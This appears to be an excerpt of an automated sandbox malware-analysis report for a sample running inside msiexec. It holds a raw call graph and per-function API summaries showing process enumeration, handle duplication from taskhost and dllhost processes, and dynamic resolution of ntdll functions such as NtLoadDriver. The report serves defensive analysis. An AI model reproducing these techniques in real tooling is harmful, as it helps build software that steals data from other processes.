39566->39567 39573 40e2d3 39567->39573 39568 40e4a0 39569 4069a3 2 API calls 39568->39569 39571 40e4ab 39569->39571 39571->39521 39573->39568 39574 40e489 39573->39574 39575 40dd50 _wcsicmp 39573->39575 39583 40e3e0 memcpy 39573->39583 39584 40e3fb memcpy 39573->39584 39585 40e3b3 wcschr 39573->39585 39586 40e416 memcpy 39573->39586 39587 40e431 memcpy 39573->39587 39651 406e8f 13 API calls 39573->39651 39652 40dd50 _wcsicmp 39573->39652 39654 40742e 8 API calls 39573->39654 39655 406b53 SetFilePointerEx ReadFile 39573->39655 39576 40aa04 free 39574->39576 39575->39573 39577 40e491 39576->39577 39577->39568 39578 40e497 free 39577->39578 39578->39568 39580 40e376 memset 39653 40aa29 6 API calls 39580->39653 39583->39573 39584->39573 39585->39573 39586->39573 39587->39573 39588->39503 39590 406294 CloseHandle 39589->39590 39591 406224 39590->39591 39592 4096c3 CreateFileW 39591->39592 39594 40622d 39592->39594 39593 406281 GetLastError 39595 40625a 39593->39595 39594->39593 39596 40a2ef ReadFile 39594->39596 39595->39525 39600 40dd85 memset 39595->39600 39597 406244 39596->39597 39597->39593 39598 40624b 39597->39598 39598->39595 39599 406777 19 API calls 39598->39599 39599->39595 39601 409bca GetModuleFileNameW 39600->39601 39602 40ddbe CreateFileW 39601->39602 39605 40ddf1 39602->39605 39603 40afcf ??2@YAPAXI ??3@YAXPAX 39603->39605 39604 41352f 9 API calls 39604->39605 39605->39603 39605->39604 39606 40de0b NtQuerySystemInformation 39605->39606 39607 40de3b CloseHandle GetCurrentProcessId 39605->39607 39606->39605 39608 40de54 39607->39608 39609 413d4c 46 API calls 39608->39609 39618 40de88 39609->39618 39610 40e00c 39611 413d29 free FreeLibrary 39610->39611 39612 40e014 39611->39612 39612->39525 39612->39528 39613 40dea9 _wcsicmp 39614 40dee7 OpenProcess 39613->39614 39615 40debd _wcsicmp 39613->39615 39614->39618 39615->39614 39616 40ded0 _wcsicmp 39615->39616 39616->39614 39616->39618 39617 40dfef CloseHandle 39617->39618 39618->39610 39618->39613 39618->39617 39619 40df23 GetCurrentProcess DuplicateHandle 39618->39619 39622 40df8f CloseHandle 39618->39622 39623 40df78 39618->39623 39619->39618 39620 40df4c memset 39619->39620 39621 41352f 9 API calls 39620->39621 39621->39618 39622->39623 39623->39617 39623->39622 39624 40dfae _wcsicmp 39623->39624 39624->39618 39624->39623 39626 409a74 GetTempFileNameW 39625->39626 39627 409a66 GetWindowsDirectoryW 39625->39627 39626->39538 39627->39626 39628->39540 39632 406bd5 39629->39632 39633 406bad 39629->39633 39630 406bba _wcsicmp 39630->39632 39630->39633 39631 4066bf free malloc memcpy free free 39634 406be5 39631->39634 39632->39631 39638 406c0f 39632->39638 39633->39630 39633->39632 39635 40afcf ??2@YAPAXI ??3@YAXPAX 39634->39635 39634->39638 39636 406bff 39635->39636 39637 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39636->39637 39637->39638 39638->39549 39638->39550 39640 4069c4 ??3@YAXPAX 39639->39640 39641 4069af 39640->39641 39642 40b633 free 39641->39642 39643 4069ba 39642->39643 39644 40b04b ??3@YAXPAX 39643->39644 39645 4069c2 39644->39645 39645->39521 39646->39555 39647->39555 39648->39555 39649->39555 39650->39555 39651->39573 39652->39580 39653->39573 39654->39573 39655->39573 39658 40a980 39656->39658 39657 40a8bb 39657->39444 39661 40a8d0 7 API calls 39657->39661 39658->39657 39659 40a995 _wcsicmp 39658->39659 39660 40a99c wcscmp 39658->39660 39659->39658 39660->39658 39661->39444 39662->39448 39664 40aa23 RegEnumValueW 39663->39664 39664->39457 39664->39458 39665->39461 39666->39463 39668 405335 39667->39668 39669 40522a 39667->39669 39668->39040 39670 40b2cc 27 API calls 39669->39670 39671 405234 39670->39671 39672 40a804 8 API calls 39671->39672 39673 40523a 39672->39673 39712 40b273 39673->39712 39675 405248 _mbscpy _mbscat GetProcAddress 39676 40b273 27 API calls 39675->39676 39677 405279 39676->39677 39715 405211 GetProcAddress 39677->39715 39679 405282 39680 40b273 27 API calls 39679->39680 39681 40528f 39680->39681 39716 405211 GetProcAddress 39681->39716 39683 405298 39684 40b273 27 API calls 39683->39684 39685 4052a5 39684->39685 39717 405211 GetProcAddress 39685->39717 39687 4052ae 39688 40b273 27 API calls 39687->39688 39689 4052bb 39688->39689 39718 405211 GetProcAddress 39689->39718 39691 4052c4 39692 40b273 27 API calls 39691->39692 39693 4052d1 39692->39693 39719 405211 GetProcAddress 39693->39719 39695 4052da 39696 40b273 27 API calls 39695->39696 39697 4052e7 39696->39697 39720 405211 GetProcAddress 39697->39720 39699 4052f0 39700 40b273 27 API calls 39699->39700 39701 4052fd 39700->39701 39721 405211 GetProcAddress 39701->39721 39703 405306 39704 40b273 27 API calls 39703->39704 39705 405313 39704->39705 39722 405211 GetProcAddress 39705->39722 39707 40531c 39708 40b273 27 API calls 39707->39708 39709 405329 39708->39709 39723 405211 GetProcAddress 39709->39723 39711 405332 39711->39668 39713 40b58d 27 API calls 39712->39713 39714 40b18c 39713->39714 39714->39675 39715->39679 39716->39683 39717->39687 39718->39691 39719->39695 39720->39699 39721->39703 39722->39707 39723->39711 39725 40440c FreeLibrary 39724->39725 39726 40436d 39725->39726 39727 40a804 8 API calls 39726->39727 39728 404377 39727->39728 39729 404383 39728->39729 39730 404405 39728->39730 39731 40b273 27 API calls 39729->39731 39730->39052 39730->39054 39730->39055 39732 40438d GetProcAddress 39731->39732 39733 40b273 27 API calls 39732->39733 39734 4043a7 GetProcAddress 39733->39734 39735 40b273 27 API calls 39734->39735 39736 4043ba GetProcAddress 39735->39736 39737 40b273 27 API calls 39736->39737 39738 4043ce GetProcAddress 39737->39738 39739 40b273 27 API calls 39738->39739 39740 4043e2 GetProcAddress 39739->39740 39741 4043f1 39740->39741 39742 4043f7 39741->39742 39743 40440c FreeLibrary 39741->39743 39742->39730 39743->39730 39745 404413 FreeLibrary 39744->39745 39746 40441e 39744->39746 39745->39746 39746->39069 39747->39059 39749 40442e 39748->39749 39753 40447e 39748->39753 39750 40b2cc 27 API calls 39749->39750 39751 404438 39750->39751 39752 40a804 8 API calls 39751->39752 39754 40443e 39752->39754 39753->39059 39755 404445 39754->39755 39756 404467 39754->39756 39757 40b273 27 API calls 39755->39757 39756->39753 39759 404475 FreeLibrary 39756->39759 39758 40444f GetProcAddress 39757->39758 39758->39756 39760 404460 39758->39760 39759->39753 39760->39756 39762 4135f6 39761->39762 39763 4135eb FreeLibrary 39761->39763 39762->39072 39763->39762 39765 4449c4 39764->39765 39766 444a52 39764->39766 39767 40b2cc 27 API calls 39765->39767 39766->39089 39766->39090 39768 4449cb 39767->39768 39769 40a804 8 API calls 39768->39769 39770 4449d1 39769->39770 39771 40b273 27 API calls 39770->39771 39772 4449dc GetProcAddress 39771->39772 39773 40b273 27 API calls 39772->39773 39774 4449f3 GetProcAddress 39773->39774 39775 40b273 27 API calls 39774->39775 39776 444a04 GetProcAddress 39775->39776 39777 40b273 27 API calls 39776->39777 39778 444a15 GetProcAddress 39777->39778 39779 40b273 27 API calls 39778->39779 39780 444a26 GetProcAddress 39779->39780 39781 40b273 27 API calls 39780->39781 39782 444a37 GetProcAddress 39781->39782 39783 40b273 27 API calls 39782->39783 39784 444a48 GetProcAddress 39783->39784 39784->39766 39785->39100 39786->39100 39787->39100 39788->39100 39789->39091 39791 403a29 39790->39791 39805 403bed memset memset 39791->39805 39793 403ae7 39818 40b1ab free free 39793->39818 39794 403a3f memset 39799 403a2f 39794->39799 39796 403aef 39796->39107 39797 409d1f 6 API calls 39797->39799 39798 409b98 GetFileAttributesW 39798->39799 39799->39793 39799->39794 39799->39797 39799->39798 39800 40a8d0 7 API calls 39799->39800 39800->39799 39802 40a051 GetFileTime CloseHandle 39801->39802 39803 4039ca CompareFileTime 39801->39803 39802->39803 39803->39107 39804->39108 39806 414c2e 15 API calls 39805->39806 39807 403c38 39806->39807 39808 409719 2 API calls 39807->39808 39809 403c3f wcscat 39808->39809 39810 414c2e 15 API calls 39809->39810 39811 403c61 39810->39811 39812 409719 2 API calls 39811->39812 39813 403c68 wcscat 39812->39813 39819 403af5 39813->39819 39816 403af5 20 API calls 39817 403c95 39816->39817 39817->39799 39818->39796 39820 403b02 39819->39820 39821 40ae18 9 API calls 39820->39821 39829 403b37 39821->39829 39822 403bdb 39823 40aebe FindClose 39822->39823 39824 403be6 39823->39824 39824->39816 39825 40ae18 9 API calls 39825->39829 39826 40ae51 9 API calls 39826->39829 39827 40aebe FindClose 39827->39829 39828 40add4 wcscmp wcscmp 39828->39829 39829->39822 39829->39825 39829->39826 39829->39827 39829->39828 39830 40a8d0 7 API calls 39829->39830 39830->39829 39832 409d1f 6 API calls 39831->39832 39833 404190 39832->39833 39846 409b98 GetFileAttributesW 39833->39846 39835 40419c 39836 4041a7 6 API calls 39835->39836 39837 40435c 39835->39837 39838 40424f 39836->39838 39837->39134 39838->39837 39840 40425e memset 39838->39840 39842 409d1f 6 API calls 39838->39842 39843 40a8ab 9 API calls 39838->39843 39847 414842 39838->39847 39840->39838 39841 404296 wcscpy 39840->39841 39841->39838 39842->39838 39844 4042b6 memset memset _snwprintf wcscpy 39843->39844 39844->39838 39845->39132 39846->39835 39850 41443e 39847->39850 39849 414866 39849->39838 39851 41444b 39850->39851 39852 414451 39851->39852 39853 4144a3 GetPrivateProfileStringW 39851->39853 39854 414491 39852->39854 39855 414455 wcschr 39852->39855 39853->39849 39857 414495 WritePrivateProfileStringW 39854->39857 39855->39854 39856 414463 _snwprintf 39855->39856 39856->39857 39857->39849 39858->39138 39860 40b2cc 27 API calls 39859->39860 39861 409615 39860->39861 39862 409d1f 6 API calls 39861->39862 39863 409625 39862->39863 39888 409b98 GetFileAttributesW 39863->39888 39865 409634 39866 409648 39865->39866 39889 4091b8 memset 39865->39889 39868 40b2cc 27 API calls 39866->39868 39875 408801 39866->39875 39869 40965d 39868->39869 39870 409d1f 6 API calls 39869->39870 39871 40966d 39870->39871 39941 409b98 GetFileAttributesW 39871->39941 39873 40967c 39874 409681 39873->39874 39873->39875 39942 409529 72 API calls 39874->39942 39875->39141 39875->39169 39877 409690 39877->39875 39878->39163 39879->39169 39888->39865 39943 40a6e6 WideCharToMultiByte 39889->39943 39891 409202 39944 444432 39891->39944 39894 40b273 27 API calls 39895 409236 39894->39895 39990 438552 39895->39990 39898 409383 39900 40b273 27 API calls 39898->39900 39899 4251c4 136 API calls 39903 409254 39899->39903 39901 409399 39900->39901 39904 438552 133 API calls 39901->39904 39902 40937b 39997 424f26 122 API calls 39902->39997 39903->39902 39993 4253cf 17 API calls 39903->39993 39923 4093a3 39904->39923 39907 4094ff 40001 443d90 39907->40001 39908 409267 39994 4253cf 17 API calls 39908->39994 39911 4251c4 136 API calls 39911->39923 39912 409273 39995 4253af 17 API calls 39912->39995 39913 409507 39920 40951d 39913->39920 40021 408f2f 77 API calls 39913->40021 39915 4093df 40000 424f26 122 API calls 39915->40000 39916 40927f 39996 4253af 17 API calls 39916->39996 39917 4253cf 17 API calls 39917->39923 39920->39866 39922 40928b 39922->39902 39924 4092be memcpy memcmp 39922->39924 39923->39907 39923->39911 39923->39915 39923->39917 39925 4093e4 39923->39925 39926 409333 memcmp 39924->39926 39927 4092e5 39924->39927 39998 4253af 17 API calls 39925->39998 39926->39902 39930 409347 memcpy 39926->39930 39927->39902 39929 4092f2 memcpy memcpy 39927->39929 39932 409363 memcpy 39929->39932 39930->39932 39931 4093ed 39999 4253af 17 API calls 39931->39999 39932->39902 39934 4093f9 39934->39915 39935 409409 memcmp 39934->39935 39935->39915 39936 409421 memcmp 39935->39936 39937 4094a4 memcmp 39936->39937 39938 409435 39936->39938 39937->39915 39940 4094b8 memcpy memcpy 39937->39940 39938->39915 39939 409442 memcpy memcpy memcpy 39938->39939 39939->39915 39940->39915 39941->39873 39942->39877 39943->39891 40022 4438b5 39944->40022 39946 44444c 39947 409215 39946->39947 40036 415a6d 39946->40036 39947->39894 39947->39920 39950 44469e 39950->39947 39953 443d90 110 API calls 39950->39953 39951 444486 39952 4444b9 memcpy 39951->39952 39989 4444a4 39951->39989 40040 415258 39952->40040 39953->39947 39955 444524 39956 444541 39955->39956 39957 44452a 39955->39957 40043 444316 39956->40043 39958 416935 16 API calls 39957->39958 39958->39989 39961 444316 18 API calls 39962 444563 39961->39962 39963 444316 18 API calls 39962->39963 39964 44456f 39963->39964 39965 444316 18 API calls 39964->39965 40078 4442e6 11 API calls 39989->40078 39991 438460 133 API calls 39990->39991 39992 409240 39991->39992 39992->39898 39992->39899 39993->39908 39994->39912 39995->39916 39996->39922 39997->39898 39998->39931 39999->39934 40000->39907 40002 443da3 40001->40002 40011 443db6 40001->40011 40097 41707a 11 API calls 40002->40097 40004 443da8 40005 443dbc 40004->40005 40006 443dac 40004->40006 40099 4300e8 memset memset memcpy 40005->40099 40098 4446ea 11 API calls 40006->40098 40009 443de0 40011->39913 40012 443dce 40012->40009 40016 443e22 40012->40016 40013 443e5a 40016->40013 40100 41f0ac 102 API calls 40016->40100 40021->39920 40023 4438d0 40022->40023 40033 4438c9 40022->40033 40079 415378 memcpy memcpy 40023->40079 40033->39946 40037 415a77 40036->40037 40038 415a8d 40037->40038 40039 415a7e memset 40037->40039 40038->39951 40039->40038 40041 4438b5 11 API calls 40040->40041 40042 41525d 40041->40042 40042->39955 40044 444328 40043->40044 40045 444423 40044->40045 40046 44434e 40044->40046 40080 4446ea 11 API calls 40045->40080 40048 432d4e 3 API calls 40046->40048 40049 44435a 40048->40049 40051 444375 40049->40051 40056 44438b 40049->40056 40050 432d4e 3 API calls 40052 4443ec 40050->40052 40053 416935 16 API calls 40051->40053 40054 444381 40052->40054 40055 416935 16 API calls 40052->40055 40053->40054 40054->39961 40055->40054 40056->40050 40078->39950 40080->40054 40097->40004 40098->40011 40099->40012 40100->40016 40131 413f4f 40103->40131 40106 413f37 K32GetModuleFileNameExW 40107 413f4a 40106->40107 40107->39201 40109 413969 wcscpy 40108->40109 40110 41396c wcschr 40108->40110 40121 413a3a 40109->40121 40110->40109 40112 41398e 40110->40112 40136 4097f7 wcslen wcslen _memicmp 40112->40136 40114 41399a 40115 4139a4 memset 40114->40115 40116 4139e6 40114->40116 40137 409dd5 GetWindowsDirectoryW wcscpy 40115->40137 40117 413a31 wcscpy 40116->40117 40118 4139ec memset 40116->40118 40117->40121 40138 409dd5 GetWindowsDirectoryW wcscpy 40118->40138 40121->39201 40122 4139c9 wcscpy wcscat 40122->40121 40123 413a11 memcpy wcscat 40123->40121 40125 413cb0 GetModuleHandleW 40124->40125 40126 413cda 40124->40126 40125->40126 40127 413cbf GetProcAddress 40125->40127 40128 413ce3 GetProcessTimes 40126->40128 40129 413cf6 40126->40129 40127->40126 40128->39204 40129->39204 40130->39195 40132 413f2f 40131->40132 40133 413f54 40131->40133 40132->40106 40132->40107 40134 40a804 8 API calls 40133->40134 40135 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40134->40135 40135->40132 40136->40114 40137->40122 40138->40123 40139->39225 40140->39248 40142 409cf9 GetVersionExW 40141->40142 40143 409d0a 40141->40143 40142->40143 40143->39254 40143->39258 40144->39262 40145->39264 40146->39330 40148 40bba5 40147->40148 40192 40cc26 40148->40192 40151 40bd4b 40213 40cc0c 40151->40213 40156 40b2cc 27 API calls 40157 40bbef 40156->40157 40220 40ccf0 _wcsicmp 40157->40220 40159 40bbf5 40159->40151 40221 40ccb4 6 API calls 40159->40221 40161 40bc26 40162 40cf04 17 API calls 40161->40162 40163 40bc2e 40162->40163 40164 40bd43 40163->40164 40165 40b2cc 27 API calls 40163->40165 40166 40cc0c 4 API calls 40164->40166 40167 40bc40 40165->40167 40166->40151 40222 40ccf0 _wcsicmp 40167->40222 40169 40bc46 40169->40164 40170 40bc61 memset memset WideCharToMultiByte 40169->40170 40223 40103c strlen 40170->40223 40172 40bcc0 40173 40b273 27 API calls 40172->40173 40174 40bcd0 memcmp 40173->40174 40174->40164 40175 40bce2 40174->40175 40176 404423 37 API calls 40175->40176 40177 40bd10 40176->40177 40177->40164 40178 40bd3a LocalFree 40177->40178 40179 40bd1f memcpy 40177->40179 40178->40164 40179->40178 40180->39343 40181->39379 40182->39379 40183->39379 40184->39379 40185->39379 40186->39379 40187->39379 40188->39379 40189->39379 40190->39355 40191->39376 40224 4096c3 CreateFileW 40192->40224 40194 40cc34 40195 40cc3d GetFileSize 40194->40195 40197 40bbca 40194->40197 40196 40afcf 2 API calls 40195->40196 40198 40cc64 40196->40198 40197->40151 40204 40cf04 40197->40204 40225 40a2ef ReadFile 40198->40225 40200 40cc71 40226 40ab4a MultiByteToWideChar 40200->40226 40202 40cc95 CloseHandle 40203 40b04b ??3@YAXPAX 40202->40203 40203->40197 40205 40b633 free 40204->40205 40206 40cf14 40205->40206 40232 40b1ab free free 40206->40232 40208 40cf1b 40209 40bbdd 40208->40209 40211 40cfef 40208->40211 40233 40cd4b 40208->40233 40209->40151 40209->40156 40212 40cd4b 14 API calls 40211->40212 40212->40209 40214 40b633 free 40213->40214 40215 40cc15 40214->40215 40216 40aa04 free 40215->40216 40217 40cc1d 40216->40217 40279 40b1ab free free 40217->40279 40219 40b7d4 memset CreateFileW 40219->39336 40219->39337 40220->40159 40221->40161 40222->40169 40223->40172 40224->40194 40225->40200 40227 40ab6b 40226->40227 40231 40ab93 40226->40231 40228 40a9ce 4 API calls 40227->40228 40229 40ab74 40228->40229 40230 40ab7c MultiByteToWideChar 40229->40230 40230->40231 40231->40202 40232->40208 40234 40cd7b 40233->40234 40267 40aa29 6 API calls 40234->40267 40236 40cef5 40237 40aa04 free 40236->40237 40238 40cefd 40237->40238 40238->40208 40239 40cd89 40239->40236 40268 40aa29 6 API calls 40239->40268 40241 40ce1d 40269 40aa29 6 API calls 40241->40269 40243 40ce3e 40246 40ce6a 40243->40246 40270 40abb7 wcslen memmove 40243->40270 40244 40ce9f 40276 40a8d0 7 API calls 40244->40276 40246->40244 40273 40abb7 wcslen memmove 40246->40273 40248 40ce56 40271 40aa71 wcslen 40248->40271 40250 40ceb5 40277 40a8d0 7 API calls 40250->40277 40252 40ce8b 40274 40aa71 wcslen 40252->40274 40253 40ce5e 40272 40abb7 wcslen memmove 40253->40272 40257 40ce93 40275 40abb7 wcslen memmove 40257->40275 40258 40cecb 40278 40d00b malloc memcpy free free 40258->40278 40261 40cedd 40262 40aa04 free 40261->40262 40263 40cee5 40262->40263 40264 40aa04 free 40263->40264 40265 40ceed 40264->40265 40266 40aa04 free 40265->40266 40266->40236 40267->40239 40268->40241 40269->40243 40270->40248 40271->40253 40272->40246 40273->40252 40274->40257 40275->40244 40276->40250 40277->40258 40278->40261 40279->40219 40280->39395 40281->39403 40282 441819 40285 430737 40282->40285 40284 441825 40286 430756 40285->40286 40298 43076d 40285->40298 40287 430774 40286->40287 40288 43075f 40286->40288 40300 43034a memcpy 40287->40300 40299 4169a7 11 API calls 40288->40299 40291 4307ce 40293 430819 memset 40291->40293 40301 415b2c 11 API calls 40291->40301 40292 43077e 40292->40291 40296 4307fa 40292->40296 40292->40298 40293->40298 40295 4307e9 40295->40293 40295->40298 40302 4169a7 11 API calls 40296->40302 40298->40284 40299->40298 40300->40292 40301->40295 40302->40298 40303 41493c EnumResourceNamesW

                                                                                                    Executed Functions

                                                                                                    Function 0040DD85 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 212filenativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 358 40de74-40de78 355->358 359 40de65-40de6c 355->359 358->352 358->355 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                    • String ID: dllhost.exe$p+8w@F8w@B8w$taskhost.exe$taskhostex.exe
                                                                                                    • API String ID: 708747863-2348828428
                                                                                                    • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                    • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                    Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 657 413ee4 649->657 658 413ee7-413efe 649->658 663 413ea2-413eae CloseHandle 651->663 655 413e61-413e68 652->655 656 413e37-413e44 GetModuleHandleW 652->656 655->651 661 413e6a-413e76 655->661 656->655 660 413e46-413e5c GetProcAddress 656->660 657->658 658->639 660->655 661->651 663->642
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                    • API String ID: 1344430650-1740548384
                                                                                                    • Opcode ID: 7c7ced78dc977ac1984e29a997ae28abe0cf01dcec689db1eb0d9dc9294447ec
                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                    • Opcode Fuzzy Hash: 7c7ced78dc977ac1984e29a997ae28abe0cf01dcec689db1eb0d9dc9294447ec
                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                    Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
